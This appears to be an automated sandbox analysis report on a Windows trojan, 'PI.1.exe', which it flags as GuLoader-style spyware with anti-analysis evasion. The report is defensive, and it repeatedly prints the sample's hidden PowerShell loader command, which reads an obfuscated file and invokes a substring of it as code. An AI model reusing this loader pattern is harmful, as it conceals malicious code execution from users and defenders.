Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/17@3/3
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040326A
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_00404579 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404579
Source: C:\Users\user\Desktop\PI.1.exe Code function: 0_2_00402095 CoCreateInstance, 0_2_00402095
Source: C:\Users\user\Desktop\PI.1.exe File created: C:\Users\user\AppData\Roaming\dyrekllers Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Users\user\Desktop\PI.1.exe File created: C:\Users\user\AppData\Local\Temp\nso6E1E.tmp Jump to behavior
Source: PI.1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\PI.1.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PI.1.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\PI.1.exe File read: C:\Users\user\Desktop\PI.1.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PI.1.exe C:\Users\user\Desktop\PI.1.exe
Source: C:\Users\user\Desktop\PI.1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Credibilities=Get-Content 'C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red';$Skrupkedet=$Credibilities.SubString(60665,3);.$Skrupkedet($Credibilities)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
Source: C:\Users\user\Desktop\PI.1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Credibilities=Get-Content 'C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red';$Skrupkedet=$Credibilities.SubString(60665,3);.$Skrupkedet($Credibilities) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Source: C:\Users\user\Desktop\PI.1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: PI.1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007BCF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbK source: powershell.exe, 00000003.00000002.1570017058.0000000008B15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000003.00000002.1561312536.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1569685053.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000003.00000002.1561312536.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbE source: powershell.exe, 00000003.00000002.1567339564.0000000007B8B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000002.1567339564.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1561312536.000000000344D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000003.00000002.1570733710.0000000009690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Obfuscated command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0 Jump to behavior
Suspicious powershell command line found
Source: C:\Users\user\Desktop\PI.1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Credibilities=Get-Content 'C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red';$Skrupkedet=$Credibilities.SubString(60665,3);.$Skrupkedet($Credibilities)
Source: C:\Users\user\Desktop\PI.1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Credibilities=Get-Content 'C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red';$Skrupkedet=$Credibilities.SubString(60665,3);.$Skrupkedet($Credibilities) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_0514B4A8 pushad ; iretd 3_2_0514B501
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E1D5D pushad ; ret 3_2_095E1D5E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E275B push cs; ret 3_2_095E2789
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E234A push edi; iretd 3_2_095E234B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E2747 push cs; ret 3_2_095E2789
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E27DB push cs; ret 3_2_095E2789
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E31B7 push ecx; iretd 3_2_095E31B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E0873 push esi; iretd 3_2_095E0876
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E14F6 push edx; retf 3_2_095E14F7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E0A8C push 09C4B4A3h; iretd 3_2_095E0A97
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_095E28A7 push ecx; retf 3_2_095E28CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE27DB push cs; ret 13_2_03CE2789
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE31B7 push ecx; iretd 13_2_03CE31B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE234A push edi; iretd 13_2_03CE234B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE2747 push cs; ret 13_2_03CE2789
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE1D5D pushad ; ret 13_2_03CE1D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE275B push cs; ret 13_2_03CE2789
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE14F6 push edx; retf 13_2_03CE14F7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE0A8C push 09C4B4A3h; iretd 13_2_03CE0A97
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE28A7 push ecx; retf 13_2_03CE28CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_03CE0873 push esi; iretd 13_2_03CE0876
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205BA1A0 push esp; ret 13_2_205BA1A1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_205B0C3D push edi; ret 13_2_205B0CC2
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\PI.1.exe Jump to dropped file
Source: C:\Users\user\Desktop\PI.1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 205B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 206C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 226C0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7436 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1853 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 1467 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 8360 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
